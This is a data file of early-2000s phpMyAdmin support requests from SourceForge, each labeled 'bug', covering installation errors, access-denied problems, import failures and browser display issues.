I receive the following error when I open the calendar in week view mode Fatal error Call to undefined function geteventicon ) in var www html mod calendar class Display.php on line 567 Everything else seems to work fine.
Original URL https sourceforge.net p phpmyadmin support requests 277 https sourceforge.net p phpmyadmin support requests 277 Original author stroudt Found in version Latest Git","bug"
"24444","2094","select = gt; is not null doesnxc2xb4t seem to work.
i tried to select everything where one field is not null = amp;gt; fieldname varchar 50) != NULL i typed in amp;quot;NULL amp;quot; into the textfield) on the next page, the query looks like that WHERE 1 AND `soap passwort` IS NULL it doesnxc2xb4t do what i wanted it to do, so i guess itxc2xb4s a bug, but ixc2xb4m not very familiar with querys containing NULL Original URL https sourceforge.net p phpmyadmin support requests 278 https sourceforge.net p phpmyadmin support requests 278 Original author anonymous","bug"
"24444","2095","linked tables not active.
Windows XP Pro, MySQL 4.0.13, IIS I have set up the phpmyadmin database as described.
I set up a user pma as described and did all the grants.
I cannot get rid of the linked tables warning.
The diagnosis says the database is ok but nothing else is.
There are various things I cannot do with the mysql database.
Requesting structure on db and host never completes.
The other tables are ok. Browse on columns priv never completes.
It works on tables priv and user.
select from `mysql`.`columns priv` limit 0,30 works fine in eg SQLyog.
29 rows).
Status does not complete.
Looking at Privileges seems to show them correct, although Check Privileges on MySQL does not list my pma user.
Original URL https sourceforge.net p phpmyadmin support requests 279 https sourceforge.net p phpmyadmin support requests 279 Original author ian999 Found in version 2.5.1","bug"
"24444","2096","Run time error = access denied .
I receive a run time error amp;quot;error = access denied amp;quot; when I use any option on the main page.
Script debugger shows this information every time, but at different line numbers.
One or both will be on every page, all with the same program number and thread number.
Not sure if this is a problem in the config file or a code error.
program [4736] thread [5472] thread 1560 line 967 document.writeln amp;lt;form method= amp;quot;post amp;quot; target= amp;quot;phpmain [should this end with ) or amp;quot;)?]
top.frames.queryframe.document.hashform.hash.value \ amp;quot; action= amp;quot;read dump.php amp;quot; enctype= amp;quot;multipart form data amp;quot; onsubmit= amp;quot;return checkSqlQuery this) amp;quot; name= amp;quot;sqlform amp;quot; amp;gt; ); Line 1050 if top.frames.queryframe amp;amp; amp;amp; top.frames.queryframe.document amp;amp; amp;amp; top.frames.queryframe.document.queryframeform) \{ top.frames.queryframe.document.queryframeform.db.valu e = amp;quot;otgproducts amp;quot;; top.frames.queryframe.document.queryframeform.table.v alue = amp;quot;inventory amp;quot;; \} Original URL https sourceforge.net p phpmyadmin support requests 280 https sourceforge.net p phpmyadmin support requests 280 Original author rickolson Found in version 2.5.1","bug"
"24444","2097","IIS) Import dump does nothing.
A dump file made with pma does nothing when specified in the Location of the text file field.
But it works if I paste the contents as an SQL query.
This is all on my local MySQL IIS server).
I ve read various threads mentioning that the server must allow uploads, but I cannot find anything that tells you how to check this.
The file is only 172kB.
so I don t think it s anything to do with time or size.
The file can t be corrupt or it wouldn t paste.
The database was a new empty one.
Nothing at all in it s directory before or after trying.
Original URL https sourceforge.net p phpmyadmin support requests 281 https sourceforge.net p phpmyadmin support requests 281 Original author ian999 Found in version 2.5.1","bug"
"24444","2098","new install line 23 main.php errors.
Hi all, I have just installed and received errors on the webpage upon login.
Here are the errors Notice Undefined index scheme in var www html phpadmin main.php on line 23 There is a lot of functionality, I don t know what isn t showing due to these errors since I haven t used phpmyadmin previous to this install.
Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin main.php on line 25 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries ob.lib.php on line 65 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries header http.inc.php on line 14 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries header http.inc.php on line 15 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries header http.inc.php on line 16 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries header http.inc.php on line 17 Warning Cannot add header information headers already sent by output started at var www html phpadmin main.php 23) in var www html phpadmin libraries header http.inc.php on line 20 Welcome to phpMyAdmin 2.5.1 MySQL 3.23.56 running on pitsaki as root pitsaki I am not a phpcoder, therefore am out of my league diving in to fix this.
Please help?
Thanks in advance, Jon Original URL https sourceforge.net p phpmyadmin support requests 283 https sourceforge.net p phpmyadmin support requests 283 Original author jpiezo","bug"
"24444","2099","Access Denied...
??).
I get the following error when I try to load the index.php file in the myadminsql folder that I uploaded the phpmyadmin files to Welcome to PhpMyAdmin 2.4.0 Error MySQL said Access denied for user dawahcentral northbeach.globalhost.com Using password YES) I configured the config.inc.php file as the directions told me to...
I think it has to do w the domain.
I m not sure.
Is there anyone that can help me w this?
Thanks in advance for your help!
Original URL https sourceforge.net p phpmyadmin support requests 282 https sourceforge.net p phpmyadmin support requests 282 Original author anonymous Found in version 2.4.0","bug"
"24444","2100","Pages Don t Load After Home.
I ve installed phpMyAdmin 2.5.1 running with MySQL 3.23.47 part of the Adobe GoLive 6 preconfigured servers running on Macintosh OS X 10.2.6).
The first time I ran phpMyAdmin I was able to access the privileges and set up a new user.
However, upon subsequent uses, I have not been able to access any of the pages priviledges or databases).
The problem occurs in IE5.2, Safari 1.0 v85), Mozilla, and Netscape 7.02.
After reviewing some items on this site, I changed the config.inc.php file to disable OBGzip, without success.
I reviewed the Apache server error log and see repeated entries for the following [Sun Jul 6 08 41 05 2003] [error] [client xx.xx.xxx.x] File does not exist Applications GoLive Preconfigured Servers SampleSites phpMyAdmin 2.5.1 css .. images vertical line.png [Sun Jul 6 09 26 02 2003] [error] [client xx.xx.xxx.x] File does not exist Applications GoLive Preconfigured Servers SampleSites phpMyAdmin 2.5.1 css .. images vertical line.png I checked to ascertain that the file did exist in the indicated directory.
What should be my next steps in attempting to resolve this problem.
Original URL https sourceforge.net p phpmyadmin support requests 284 https sourceforge.net p phpmyadmin support requests 284 Original author chiguy Found in version 2.5.1","bug"
"24444","2101","Very long load time in ie.
When using phpmyadmin with ie 6.0, lots of the pages have a very long or infinite loading time.
Fx.
Before i started writing this, i wanted to see the content of a table and I m still waiting for it.
When using Mozilla there are no extra loading time.
Original URL https sourceforge.net p phpmyadmin support requests 286 https sourceforge.net p phpmyadmin support requests 286 Original author anonymous","bug"
"24444","2102","Table in use errno 144).
I get this message Can t open file menu.MYI .
errno 144) Restart of mysql doesnt help And I can t acces the table amp;quot;menu amp;quot; What I have to do to unhang the table ?
my email wojtek extranet.pl Original URL https sourceforge.net p phpmyadmin support requests 285 https sourceforge.net p phpmyadmin support requests 285 Original author anonymous Found in version 2.5.1","bug"
"24444","2103","Can t save as .xml.
If you check the checkbox, then submit , The .xml file can t download.
It displays in the IE.
Original URL https sourceforge.net p phpmyadmin support requests 287 https sourceforge.net p phpmyadmin support requests 287 Original author whitebai Found in version 2.5.2 rc1","bug"
"24444","2104","TEXTAREA input more than 64k.
Could anybody explain me how the phpMyAdmin SQL input textarea accepts more than 64Kb of data?
I ve tried to implement a form and the data seems to be amp;quot;cropped amp;quot; at 64Kb.
Is there a limitation in TEXTAREA fields ?
Is it possible to make it work ?
Original URL https sourceforge.net p phpmyadmin support requests 288 https sourceforge.net p phpmyadmin support requests 288 Original author anonymous Found in version 2.5.1","bug"
"24444","2105","Browse to end of results broke.
Using MySQL 3.23.56 max, the new phpMyAdmin won t display the last page of results when I browse to the last page.
Instead of restults I get the structure page for that table after some wait).
The table I browse is an InnoDB, with 236,058 records 120MB) Thanks, Daniel Wood dan pricegrabber.com Original URL https sourceforge.net p phpmyadmin support requests 289 https sourceforge.net p phpmyadmin support requests 289 Original author anonymous","bug"
"24444","2106","Client doesnt support authentication protocol.
I just installed mySQL and phpMyAdmin.
When I try to access a database at first it works just fine, but when I add a password to a mySQL account either when creating the account, via the privliges page, or by directly editing the user table), phpMyAdmin can no longer connect whether the passworded account is used in the control user or actual user field), and this applies to all three types of authentiction.
I get the following error and am unable to use phpMyAdmin Error MySQL said Client does not support authentication protocol requested by server.
Consider upgrading MySQL client Original URL https sourceforge.net p phpmyadmin support requests 290 https sourceforge.net p phpmyadmin support requests 290 Original author jaw959","bug"
"24444","2107","Internal Server Error?.
Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, animeforums woaf.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Thats what I get when i try to view the index file, i may have something wrong, but I don t know what it is.
Original URL https sourceforge.net p phpmyadmin support requests 291 https sourceforge.net p phpmyadmin support requests 291 Original author anonymous","bug"
"24444","2108","Import sql file problem.
Hello, I work on a waiter linux redhat8.0, mysql 3.23.56, phpmyadmin 2.5.1 It seems that the problem is frequent and known but I did not find a solution When I make an export towards a file sql and that I import this file in another dB by making a cut paste totality of this file of 33k with 324 lines, I have only errors, the importation of a file sql causes also errors but if I cut paste of the small pieces of request, syntax is good!!
Which is the good solution to regulate this problem?
Thanks for help Best Regards Original URL https sourceforge.net p phpmyadmin support requests 292 https sourceforge.net p phpmyadmin support requests 292 Original author anonymous Found in version 2.5.1","bug"
"24444","2109","database list restricted to authorized user.
I ve moved from 2.2.6 to 2.5.1 WAOW this new stuff is incredibely good).
I m acting as an ISP and my users customers have access to their databases through an https url and phpMyAdmin amp;quot;http amp;quot; authentication.
The problem is that now they see ALL the databases even the one they can t access).
In version 2.2.6 only the databases you had privileges on were displayed.
What have I missed in the configuration file ?
Is it a bug or a feature ?
Michel Roch michel.d.roch urbanet.ch Original URL https sourceforge.net p phpmyadmin support requests 293 https sourceforge.net p phpmyadmin support requests 293 Original author anonymous Found in version 2.5.1","bug"
"24444","2110","error 127.
I ve got erron 127 from table handler...and I can t access to data... what does it mean??
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 294 https sourceforge.net p phpmyadmin support requests 294 Original author anonymous","bug"
"24444","2111","CHAR field definition becomes a VARCHAR.
This error has appeared only after I went from 2.5.0 rc1 to 2.5.2 rc2.
The MySQL is at 4.0.12, in a local WinXP Pro environment.)
According to the MySQL manual amp;quot;6.2.3.1 The CHAR and VARCHAR Types amp;lt;snip amp;gt; The length of a CHAR column is fixed to the length that you declare when you create the table.
The length can be any value between 1 and 255.
As of MySQL Version 3.23, the length of CHAR may be 0 to 255.)
amp;quot; However, whenever I try to create a CHAR field with a length greater than 3 chars ie.
4 or more), while the CREATE ALTER command appears to run ok, the resultant table has the field showing as a VARCHAR !)
eg.
CREATE TABLE `working` `wg working code` CHAR 4 ) NOT NULL , `wg working name` VARCHAR 30 ) NOT NULL , PRIMARY KEY `wg working code` ) ) TYPE = InnoDB BUT..... afterwards the field wg working code shows as VARCHAR 4) !?!
Any ideas?
Solution?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 295 https sourceforge.net p phpmyadmin support requests 295 Original author r white 01 Found in version 2.5.2 rc2","bug"
"24444","2112","Access Denied when select table.
I uploaded the phpMyAdmin files into a new directory that I created on the server with my FTP program.
I modified config.inc.php for user and password kept localhost for host), and entered the absolute URL.
I left config for the authentication mode.
Index.php opens perfectly, with my tables displayed in the left column.
However, when I click on a table in the left column I get amp;quot;!
Done, but with errors on page amp;quot; in the bottom left corner status bar).
When I double click on the error, a window opens up indicating that the error is amp;quot;Access denied amp;quot;.
The table structure is displayed correctly on the top of the page, and everything else looks OK, but nothing happens when I click amp;quot;Go amp;quot; under the SQL query, so I can t view the data.
I m using IE 6, MySQL v. 3.23.55, and phpMyAdmin v. 2.5.1, released 6 02 2003.
Thanks for any suggestions.
Original URL https sourceforge.net p phpmyadmin support requests 296 https sourceforge.net p phpmyadmin support requests 296 Original author scooper2003 Found in version 2.5.1","bug"
"24444","2113","Cannot run sql queries.
Greetings, I m unable to submit sql queries from the query window.
Ex., window above which says, Run SQL query queries on database helenshine com Hitting the Go button here does nothing.
Thanks, Helen me helenshine.com Original URL https sourceforge.net p phpmyadmin support requests 297 https sourceforge.net p phpmyadmin support requests 297 Original author anonymous","bug"
"24444","2114","Replace by inserting from file not working.
On phpMyAdmin 2.5.2 rc2 System Win2000 SP4 MySQL 3.23.57 nt PHP Version 4.3.2 with Zend Optimizer v2.1.0 While using amp;quot;Insert data from a textfile into table amp;quot; the amp;quot;Replace table data with file amp;quot; Option won t work.
It happens allways the same if checked or not The new data is beeing added to the existing data.
Original URL https sourceforge.net p phpmyadmin support requests 298 https sourceforge.net p phpmyadmin support requests 298 Original author dandra","bug"
"24444","2115","Undefined index strRunning in Mozilla 1.2.1 and in Netscape.
I have error message in Mozilla 1.2.1 and in Netscape 7.2 when trying access index.php page.
phpMyAdmin 2.5.1, php 4.3.2) Notice Undefined index strRunning in var www.root userdirs stein db libraries auth http.auth.lib.php on line 29 Warning Cannot modify header information ...
But in IE the same hosting provider, the same website) all is working.
What is going wrong?
Alexander, sanych cstrade.ru Original URL https sourceforge.net p phpmyadmin support requests 299 https sourceforge.net p phpmyadmin support requests 299 Original author anonymous Found in version 2.5.1","bug"
"24444","2116","MySQL 4.0.13 show tables problem.
After selecting a database, a table and show the content of the DB there comes the messages that the site countn t be found.
Any other db request works fine Original URL https sourceforge.net p phpmyadmin support requests 300 https sourceforge.net p phpmyadmin support requests 300 Original author anonymous Found in version 2.5.2 rc2","bug"
"24444","2117","Create Database field not displaying.
I ve just installed phpMyAdmin and the super user account I have logged in with is getting reports of no permissions instead of a field to create new databases.
This occurs on three machines all with PHP4.3.2 one with mysql 3.23.56 and apache 2.0.40 Redhat 9 build), one with mysql 3.23.56 and apache 1.3.27 Customer Build) and one with mysql 4.0.13 and apache 1.3.27 Custom).
phpMyAdmin is configured for cookie authentication, the control user has permissions as detailedi n the Doco on phpmyadmin datbase and the mysql tables.
The user logging in has GRANT ALL PERMISSIONS ON .
.
Original URL https sourceforge.net p phpmyadmin support requests 301 https sourceforge.net p phpmyadmin support requests 301 Original author fruitcak","bug"
"24444","2118","phpBB Database Restore Error.
everything should be perfect!
i broke down my phpBB2 restore file into 17 pieces it was 4.55mb but server only allows small transfers).
I uploaded the first 9 of them, but on the 10th it says this =================================== Error SQL query INSERT INTO phpbb search wordmatch INSERT INTO phpbb search wordmatch post id, word id, title match ) VALUES 650 , 259 , 0 ) MySQL said You have an error in your SQL syntax near INSERT INTO phpbb search wordmatch post id, word id, title match) VALUES 650 , at line 1 ==================================== I am uploading in the correct order and i am 99 sure that i split it correctly.
I even checked over them all again.
What is causing this error?
Thank youuu!!
My email is mooncow ntlworld.com Thanx again From Scott Original URL https sourceforge.net p phpmyadmin support requests 302 https sourceforge.net p phpmyadmin support requests 302 Original author anonymous Found in version 2.5.2","bug"
"24444","2119","Losing connection to localhost.
hi, I am experience a strange phenomenon with phpMyAdmin.
If I try to use it on the localhost i.e.
my local web server mysql server), the page clears, and then it goes into a wait for ages until finally timing out.
If I use another machine on my LAN it works just fine.
The server is running RH8.0, mysql and Apache 2.0 If anyone has epxerienced this type of thing and knows how to fix it, I would be extremely please to here from you.
Thanks Barry Original URL https sourceforge.net p phpmyadmin support requests 303 https sourceforge.net p phpmyadmin support requests 303 Original author beach defender","bug"
"24444","2120","MySQL said Too Many Connections.
Until a couple of weeks ago, I was running Apache 2 and PHP4.32 on Windows, MySQL 3.23.44 on the same machine, and phpmyadmin 2.3.2 Since then I have added a web server Apache 1.3 on Netware) and kept my database on the Windows machine.
The Apache server on the Windows machine is also running until I get the site completely moved to the NetWare server).
Now when i try to use phpmyadmin installed on the windows machine, I get amp;quot;Mysql said Too many connections amp;quot; after logging in.
I read a response from a year ago that said to turn off persistent connections.
Will this solve my problem?
What file do I alter and on which machine...the Windows Apache2 or NetWare Apache1.3 server?
Original URL https sourceforge.net p phpmyadmin support requests 304 https sourceforge.net p phpmyadmin support requests 304 Original author dshuter","bug"
"24444","2121","2.5.3 rc1 Load data infile Access denied.
This happens with 2.5.3 rc1 worked on 2.3.3).
LOAD DATA INFILE tmp phpwfREZH INTO TABLE `sometable` FIELDS TERMINATED BY ; ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n 1045 Access denied for user test localhost Using password YES) If I enable open basedir restriction, I get amp;quot;File could not be read tmp php0UosDh amp;quot;.
It seems its like that since 2.4.0 see http www.aota.net forums printthread.php?threadid=13902 Original URL https sourceforge.net p phpmyadmin support requests 305 https sourceforge.net p phpmyadmin support requests 305 Original author anonymous","bug"
"24444","2122","Safari Query Window.
Clicking links in Safari khtml based browsers causes the link to open a new page, instead of opening up in the right hand frame.
Original URL https sourceforge.net p phpmyadmin support requests 306 https sourceforge.net p phpmyadmin support requests 306 Original author anonymous","bug"
"24444","2123","error while adding column to table.
When trying to add a new column to an existing table I get the following error reported by my PHP editor which has just in time debugging set Error mysql result ) Unable to jump to row 0 on MySQL result index 43 at c \apache2\htdocs\phpMyAdmin 2.5.2 \libraries\mysql wrappers.lib.php line 126 This same error sometimes happens when I try to switch from one database to another.
I have to close the current browser instance and start a new one.
Original URL https sourceforge.net p phpmyadmin support requests 307 https sourceforge.net p phpmyadmin support requests 307 Original author tonymarston","bug"
"24444","2124","Can t see Create New Database.
Sorry for my bad English... ) I used Windows XP as my OS, Mysql 4.0.14a win, phpMyAdmin 2.5.2 rc2, I was successfully login into mysql using phpmyadmin as a root from localhost.
But i can t see the Create New Database, it s look something like this amp;gt; Create new database [Documentation] No Privileges and not clickable... but i tried to connect to mysql using ms dos prompt, as a root and i tried to create some database and it s work.
I can create the databases.
But why in phpmyadmin i can t create the database.
Is it the bug?????
Can someone tell me about this... please.. ) Original URL https sourceforge.net p phpmyadmin support requests 308 https sourceforge.net p phpmyadmin support requests 308 Original author fid0did0 Found in version 2.5.2 rc2","bug"
"24444","2125","Access Denied error.
I have just installed the 2.5.2 pl1 release on my intranet.
I get Welcome to phpMyAdmin 2.5.2 pl1 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection.
You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server.
Error MySQL said Access denied for user kris4fizz localhost Using password YES) Now the username and password used in the config.inc file are correct the my.ini file entries are also correct in the MySQL server Configuration is as follows Win2K SP3 PHP 4.3.1 MySQL 4.0.14b My previous installation was fine with 3.23.xx MySQL Server only now do i have the access denied problems since upgrading to version 4 MYSQL Server Any Ideas?
Regards Kris Original URL https sourceforge.net p phpmyadmin support requests 309 https sourceforge.net p phpmyadmin support requests 309 Original author kris4fizz Found in version 2.5.2 pl1","bug"
"24444","2126","Backup and restore to new db name.
Hello good people ) Can someone explain to a complete novice how to backup a small MySQL db and restore it to an different filename using phpmyadmin 2.5.1.
Is there simply a copy command?
What I ve tried so far is export the existing db as SQL selecting all, saving as file amp;lt;1MB).
Then in the new empty db, from the SQL page, hitting browse, finding the exported file and clicking Go.
Seems to go through OK but afterwards the new db is still empty.
what am I doing wrong?
Thanks for any hints.
Original URL https sourceforge.net p phpmyadmin support requests 310 https sourceforge.net p phpmyadmin support requests 310 Original author anonymous","bug"
"24444","2127","Request URI Too Large.
When inserting a new record that contains a fair bit of data text field), it does it, but also returns an error message amp;quot;Request URI Too Large The requested URL s length exceeds the capacity limit for this server.
request failed URI too long amp;quot; This is happening in PHPMyAdmin 2.5.2 pl1.
Original URL https sourceforge.net p phpmyadmin support requests 311 https sourceforge.net p phpmyadmin support requests 311 Original author trparky Found in version 2.5.2 pl1","bug"
"24444","2128","Error cannot load MySQL extension.
I have just installed PHP5.
Does PHPMyAdmin 2.5.xx work with PHP5?
I get the error cannot load MySQL extension, please check PHP Configuration.
Documentation Machine Specification is I have Win2k Server SP4 PHP 5 MYsql 4012 and PHPMyadmin 2.5.2 and also tried 2.5.3,both with same errors listed above.
Any suggestions or am i going to have to resort to version 4 PHP?
TIA Kris Original URL https sourceforge.net p phpmyadmin support requests 312 https sourceforge.net p phpmyadmin support requests 312 Original author kris4fizz Found in version Latest Git","bug"
"24444","2129","Table Browsing not possible, all databases shown.
Hello, in PHPMyAdmin 2.5.3 rc1 with MySQL 4.0.14 standard every user can see all databases in left frame.
Although nobody with suitable rights can change them I believe it is a bug.
Also I do not want my customers to see any databases they do not have to administrate... A much bigger problem is given if you want to browse the database tables.
I always got the amp;quot;half amp;quot; html page with an viewable broken html tag in it.
I cannot see the contents of the database table.
Best regards, mr.hickup Original URL https sourceforge.net p phpmyadmin support requests 313 https sourceforge.net p phpmyadmin support requests 313 Original author anonymous Found in version 2.5.3 rc1","bug"
"24444","2130","The requested URL phpMyAdmin 2.5.1 db create.php was not fo.
The requested URL phpMyAdmin 2.5.1 db create.php was not found on this server.
This was done after a fresh install, am I missing something, or is this an amp;quot;install bug amp;quot; Original URL https sourceforge.net p phpmyadmin support requests 314 https sourceforge.net p phpmyadmin support requests 314 Original author cyberpawz Found in version Latest Git","bug"
"24444","2131","No Access to Table.
I have sometimes the problem that I can t access the full data...
In phpmyadmin 2.2.1 I can see all records!
If I want to change a record there is no data in...
In the PHP Web Page I can count the right value of records, but the last records are not displayed no data).
After restard the PC all is alright again.
This problem I have 2 3 times a day and only with one table.
I ve already loaded a new table after dump from backup system) without a change!
roland.horras jci.com Original URL https sourceforge.net p phpmyadmin support requests 315 https sourceforge.net p phpmyadmin support requests 315 Original author anonymous","bug"
"24444","2132","2.5.3 rc2) Unable to create databases.
In 2.5.3 rc2 I am unable to create any databases.
I have Create priv enabled on the user I have logged in.
Original URL https sourceforge.net p phpmyadmin support requests 316 https sourceforge.net p phpmyadmin support requests 316 Original author challgren Found in version 2.5.3 rc2","bug"
"24444","2133","Phpmyadmin 2.5.1 error with table name logs.
Under Phpmyadmin 2.5.1 English if you have a table named amp;quot;logs amp;quot;, if you want select with amp;quot;left join amp;quot; like this SELECT tache, DATE FORMAT datelog, d m Y H i S ) AS datelog FROM LOGS LEFT JOIN logtype ON logs.idlt = logtype.idlt WHERE logtype.name = acces ORDER BY datelog DESC phpmyadmin respond this MySQL a rxc3xa9pondu Table inconnue logs dans on clause But this request work in html page, no in phpmyadmin.
French Si l on a une table nommxc3xa9e amp;quot;logs amp;quot; et que l on souhaite faire une requete amp;quot;left join amp;quot; comme celle ci SELECT tache, DATE FORMAT datelog, d m Y H i S ) AS datelog FROM LOGS LEFT JOIN logtype ON logs.idlt = logtype.idlt WHERE logtype.name = acces ORDER BY datelog DESC phpmyadmin rxc3xa9pond MySQL a rxc3xa9pondu Table inconnue logs dans on clause Mais cette requxc4x99te fonctionne dans une page web classique, mais pas dans phpmyadmin Vincent, dvincent chez.com Original URL https sourceforge.net p phpmyadmin support requests 317 https sourceforge.net p phpmyadmin support requests 317 Original author anonymous","bug"
"24444","2134","Large table repair timing out.
I m trying to repair a large table 108MB) via phpmyadmin, but it keeps timing out.
Can someone please tell me what to do so that I can get my table repaired?
Thanks!
nicoleboone earthlink.net Original URL https sourceforge.net p phpmyadmin support requests 318 https sourceforge.net p phpmyadmin support requests 318 Original author anonymous","bug"
"24444","2135","Problem with auth type=http.
auth type= http works only if sql server is running on the same machine.
If sql is running on a different host it doesn t work.
phpMyAdmin doesn t contact the sql server.
I ve checked it with iptraf and tcpdump.
Using auth type= cookie is working great.
Therefore it shouldn t be a configuration problem.
Original URL https sourceforge.net p phpmyadmin support requests 319 https sourceforge.net p phpmyadmin support requests 319 Original author katagia","bug"
"24444","2136","Exit Restart and starting more programs.
Hey all, I am running apache 2.0.47 with php 4.3.3 and MySQL 4.0.14 on WinXP with MyAdmin 2.5.4 dev however the problem below also happened with 2.5.3.
I have no idea WHY it happens but here is WHAT happens..
Whenever I use MyAdmin it frequently generates this error in the apache logfiles Parent child process exited with status 4294967295 Restarting.
the only thing noticeble about this is that it gets slower and slower to a point of no response.
In my apache config I also use cronolog.exe for logfile rotation and with each restart this program gets started again.. without closing the old ones.
It does not generate double logentries.. but having it run 80 times is not real good.
Hope this can give some clues.
Original URL https sourceforge.net p phpmyadmin support requests 320 https sourceforge.net p phpmyadmin support requests 320 Original author anonymous","bug"
"24444","2137","User with only quot;select quot; privileges could drop a database.
Using the root user with all privileges, I created a test user host ) with only the SELECT privilege.
Then I closed the browser, and I re logged into phpmyadmin with the test user.
I proceeded to drop a database with nothing stopping me.
This happened with version 2.5.2 pl1.
Thanks, Steve Original URL https sourceforge.net p phpmyadmin support requests 321 https sourceforge.net p phpmyadmin support requests 321 Original author anonymous","bug"
"24444","2138","error from index.php.
first thing I noticed was in docs says to open ... www.your.org your directory index.php3 well the actual file is index.php ok now when I run this it give this back to me not sure if I have config d wrong or what as I checked and the libs are actually all there here is the output from index.php Warning main .
libraries auth https.auth.lib.php) failed to open stream No such file or directory in groups nkov www phpadminSQL libraries common.lib.
php on line 773 Warning main ) Failed opening .
libraries auth https.auth.lib.php for inclusion include path= . )
in groups nkov www phpadminSQL libraries common.lib.
php on line 773 Fatal error Call to undefined function pma auth check ) in groups nkov www phpadminSQL libraries common.lib.
php on line 774 ty Kits redkitsand hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 322 https sourceforge.net p phpmyadmin support requests 322 Original author anonymous Found in version 2.5.3 rc2","bug"
"24444","2139","flush privileges.
Maybe it can be handy to have a link after insert update delete a user from the Mysql user table that performs the flush privileges query.
So you can make the changes active whitout restarting mysql.
PhpmyAdmin = Graet Tool o) Greetz mistery20 wanadoo.be Original URL https sourceforge.net p phpmyadmin support requests 323 https sourceforge.net p phpmyadmin support requests 323 Original author anonymous Found in version 2.5.3 rc2","bug"
"24444","2140","Security errors after installation.
I m having big problems getting what should be an identical implementation of MySQL v4.0.12 nt) and phpmyadmin v2.5.2.rc 2) on a second PC to work.
I m also using PHP v4.3.1) and Apache v2.0.4.5) providing a amp;quot;localhost amp;quot; http server.
I ve always used phpmyadmin successfully on my other PC to do everything in MySQL and now I can t see how or why I m getting the errors in my new copy) implementation.
Right down to the directory and database, this is meant to be an exact copy of the original on my first pc and that works fine.
Now in my new phpmyadmin installation I get the following error on just about every screen amp;quot;Error Access is denied amp;quot; For example, on trying to browse a file I get this on amp;quot;line 391 amp;quot;, amp;lt;script type= amp;quot;text javascript amp;quot; amp;gt; amp;lt;!
if parent.frames.queryframe amp;amp; amp;amp; parent.frames.queryframe.document amp;amp; amp;amp; parent.frames.queryframe.document.queryframeform) \{ parent.frames.queryframe.document.queryframeform.db.v alue = amp;quot;my database amp;quot;; parent.frames.queryframe.document.queryframeform.tabl e.value = amp;quot;entity amp;quot;; \} THIS above code is similar to the code in other pages where I get the same error.
Anybody have a clue of what my security permissions problem may be?
Or better still how to fix it?
PS I have 3 users defined in MySQL, all with ALL privileges, and no default user | host | user | | | root | | localhost | root | | localhost | whiter | Thanks Original URL https sourceforge.net p phpmyadmin support requests 325 https sourceforge.net p phpmyadmin support requests 325 Original author r white 01 Found in version 2.5.2 rc2","bug"
"24444","2141","2.5.2) Impossible to run multiple servers on one host.
If you try to run multiple servers on the same host name, phpMyAdmin will get confused it seems to use the distinction that amp;quot;unique server ID == host name amp;quot;.
It should be amp;quot;unique server ID = host name port amp;quot;, since you may very well be running multiple daemons on one machine.
Original URL https sourceforge.net p phpmyadmin support requests 324 https sourceforge.net p phpmyadmin support requests 324 Original author anonymous","bug"
"24444","2142","cfg[ Servers ][ i][ auth type ] = http ; lt; error.
Hi, i ve found a bug when i write cfg[ Servers ][ i][ auth type ] = http ; in the config.inc.php.
My directory of phpmyadmin is in the directory private with a .htaccess.
private contains .htaccess phpMyAdmin 2.5.3 The .htaccess AuthUserFile home valerio .htpasswd AuthGroupFile dev null AuthName amp;quot;Acces Restreint amp;quot; AuthType Basic amp;lt;Limit GET POST amp;gt; require valid user amp;lt; Limit amp;gt; I successfull log in the private directory, but when i try to log in the phpMyAdmin 2.5.3 i write good login pass, but he show the dialog box of the .htaccess in private To sum up, i can t login to ... PS sorry for my english, i m belgian and i speak french, but i hope you ll understand me ... let me know if it s a bug or just a bad configuration ... Valerio valerio dogweb.be) Original URL https sourceforge.net p phpmyadmin support requests 326 https sourceforge.net p phpmyadmin support requests 326 Original author anonymous Found in version 2.5.3","bug"
"24444","2143","PDF page numbers, off by one.
this occours with 2.5.2 p1 gentoo emerge version, if it matters at all) when i printed a pdf today the page numbers on the table of contents were off by one, page 7 was actually 8... etc...., ive included a copy of the pdf, i dont know if it will help.
also the creation date and last update on the schema pags, always seems to be the same, i know the tables have been updated a couple times, so this should not be the case.
i live the new pdf thing thou, im definitly going to be using it for all my work projects.
Original URL https sourceforge.net p phpmyadmin support requests 327 https sourceforge.net p phpmyadmin support requests 327 Original author thrasher6669","bug"
"24444","2144","Troubling with a new install.
I ve just installed phpMyAdmin 2.5.3 and I thought I d followed all of the installation instructions and setup the config.inc.php file correctly.
I m able to log in properly but when I try to add a field to a table, I get the following error 7 Error on rename of .
UBR sheets.MYI to .
UBR sql2 d70bb0a1 d7.MYI Errcode 16) Any ideas what I might have done wrong and what I need to do to fix this?
If it helps, I m running on a Novell Netware 5.1 server with SP5 installed.
I m also using mySQL4.0.3 Beta which is the best release for a NW51 server available).
Original URL https sourceforge.net p phpmyadmin support requests 328 https sourceforge.net p phpmyadmin support requests 328 Original author ctiberious Found in version 2.5.3","bug"
"24444","2145","Change date format.
Hi, how can I change the dateformat for all the date colums in the insert, update and view of a table?
Instead of Y m d I wuold put the italian style d m Y Best regard, Davide Original URL https sourceforge.net p phpmyadmin support requests 329 https sourceforge.net p phpmyadmin support requests 329 Original author anonymous","bug"
"24444","2146","Cannot import SQL which is exported by using EXTENDED Insert.
If table has 380 entries each one is average book chapter long) and it is exported using COMPLETE and EXTENDED Inserts, it cannot be imported back.
I get message that MysQL server is gone away.
I tried to import the same SQL file with MySQL Navigator, but also could not.
If I export just using DATA checkbox, everything works.
Original URL https sourceforge.net p phpmyadmin support requests 330 https sourceforge.net p phpmyadmin support requests 330 Original author anonymous","bug"
"24444","2147","cannot insert data from textfile.
When inserting data from a text file into the currently selected table, I get the following error.
